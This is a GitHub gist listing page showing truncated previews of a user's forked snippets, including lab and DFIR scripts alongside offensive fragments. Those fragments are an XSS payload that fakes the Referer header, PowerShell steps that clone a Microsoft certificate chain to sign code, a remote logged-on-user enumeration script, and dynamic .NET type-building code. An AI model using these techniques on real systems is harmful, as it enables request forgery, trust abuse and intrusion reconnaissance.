Skip to content

Instantly share code, notes, and snippets.

View thinkst-cs's full-sized avatar

thinkst-cs

2 followers · 0 following
View GitHub Profile
@thinkst-cs
thinkst-cs / New-LabRootCA.ps1
Created May 22, 2024 19:58 — forked from JaekelEDV/New-LabRootCA.ps1
Powershell Script to install and configure a standalone RootCA for Lab-Environments
<#
.SYNOPSIS
Script to install and configure a standalone RootCA for Lab-Environments
.DESCRIPTION
This Script sets up a standalone RootCA. It's main purpose is to save time when building Labs in the classes I teach.
###It's not meant for production!###
First, it creates a CAPolicy.inf file. Then it deletes all default CDP and AIA and configures new ones.
It turns on auditing and copys (It's a Lab!!!, so obviously no real offline RootCA...) the crt and crl to an edge webserver.
.NOTES
Author: Oliver Jäkel | oj@jaekel-edv.de | @JaekelEDV
@thinkst-cs
thinkst-cs / DFIR-RatPack.ps1
Created April 29, 2024 23:29
RATPACK - DFIR Common exes - Single Script to setup and alert on any of them executing on an endpoint
# List of apps to monitor execution.
$monitoredApp = @("nltest.exe","systeminfo.exe","adfind.exe","wmic.exe", "klist.exe")
#
## If we need Process Details use = $pn=$(Get-WmiObject win32_process -Filter ''ProcessID = %e'' | select ProcessName,PrcessID, CommandLine etc..)
<#
Sample Use:
@thinkst-cs
thinkst-cs / data.json
Created February 7, 2024 00:00 — forked from jdarling/data.json
Using D3 to create a Bullseye or Layered Harvey Ball charts
[
{
"name":"Test App 1",
"children":[
{"name":"Configurations","progress":1},
{"name":"UI","progress":1},
{"name":"Backend","progress":0.25}
]
},
{
@thinkst-cs
thinkst-cs / Windows-CLSID.csv
Created February 6, 2024 23:30 — forked from olafhartong/Windows-CLSID.csv
We can't make this file beautiful and searchable because it's too large.
CLSID,ClassName
{0000031A-0000-0000-C000-000000000046},CLSID
{0000002F-0000-0000-C000-000000000046},CLSID CLSID_RecordInfo
{00000100-0000-0010-8000-00AA006D2EA4},CLSID DAO.DBEngine.36
{00000101-0000-0010-8000-00AA006D2EA4},CLSID DAO.PrivateDBEngine.36
{00000103-0000-0010-8000-00AA006D2EA4},CLSID DAO.TableDef.36
{00000104-0000-0010-8000-00AA006D2EA4},CLSID DAO.Field.36
{00000105-0000-0010-8000-00AA006D2EA4},CLSID DAO.Index.36
{00000106-0000-0010-8000-00AA006D2EA4},CLSID DAO.Group.36
{00000107-0000-0010-8000-00AA006D2EA4},CLSID DAO.User.36
@thinkst-cs
thinkst-cs / setRefererHeader.js
Created January 25, 2024 22:08 — forked from hoodoer/setRefererHeader.js
Code Snippet to Set 'Referer' Header using JavaScript (e.g. XSS Payload)
// Save the current URL path to restore after making
// malicious request with faked referer header value
var savedPath = window.location.pathname;
var savedSearch = window.location.search;
// Change URL/History to control the referer header value
// Swap out "/this-is-my-fake-referer-value" to be what you need
window.history.replaceState(null, '', '/this-is-my-fake-referer-value');
// Send malicious request with faked referer header value
@thinkst-cs
thinkst-cs / modsqrt.py
Created January 8, 2024 22:47 — forked from nakov/modsqrt.py
mod_sqrt - Python 3 implementation
def modular_sqrt(a, p):
def legendre_symbol(a, p):
""" Compute the Legendre symbol a|p using
Euler's criterion. p is a prime, a is
relatively prime to p (if p divides
a, then a|p = 0)
Returns 1 if a has a square root modulo
p, -1 otherwise.
@thinkst-cs
thinkst-cs / primes.py
Created January 8, 2024 22:35 — forked from B45i/primes.py
Python list containing first 10,000 prime numbers
primes = [ 2, 3, 5, 7, 11, 13, 17, 19, 23, 29,
31, 37, 41, 43, 47, 53, 59, 61, 67, 71,
73, 79, 83, 89, 97, 101, 103, 107, 109, 113,
127, 131, 137, 139, 149, 151, 157, 163, 167, 173,
179, 181, 191, 193, 197, 199, 211, 223, 227, 229,
233, 239, 241, 251, 257, 263, 269, 271, 277, 281,
283, 293, 307, 311, 313, 317, 331, 337, 347, 349,
353, 359, 367, 373, 379, 383, 389, 397, 401, 409,
419, 421, 431, 433, 439, 443, 449, 457, 461, 463,
467, 479, 487, 491, 499, 503, 509, 521, 523, 541,
@thinkst-cs
thinkst-cs / CertificateCloning.ps1
Created December 14, 2023 21:34 — forked from mattifestation/CertificateCloning.ps1
The steps required to clone a legitimate certificate chain and sign code with it.
# We'll just store the cloned certificates in current user "Personal" store for now.
$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }
$MS_Root_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Root.cer
$Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation
$MS_PCA_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32PCA.cer
$Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation
$MS_Leaf_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Leaf.cer
@thinkst-cs
thinkst-cs / Get-LoggedOn.py
Created November 2, 2023 16:52 — forked from GeisericII/Get-LoggedOn.py
Stupid simple script copied and pasted from reg.py/lookupsid and inspired from itm4n's session enum via registry
#!/usr/bin/python3
from __future__ import division
from __future__ import print_function
import re
import codecs
import logging
import time
import argparse
import sys
from impacket import version
@thinkst-cs
thinkst-cs / tasks.cs
Created October 4, 2023 23:10 — forked from xpn/tasks.cs
Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX , but not posting that publicly
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
using System.Collections;
using System.Collections.Generic;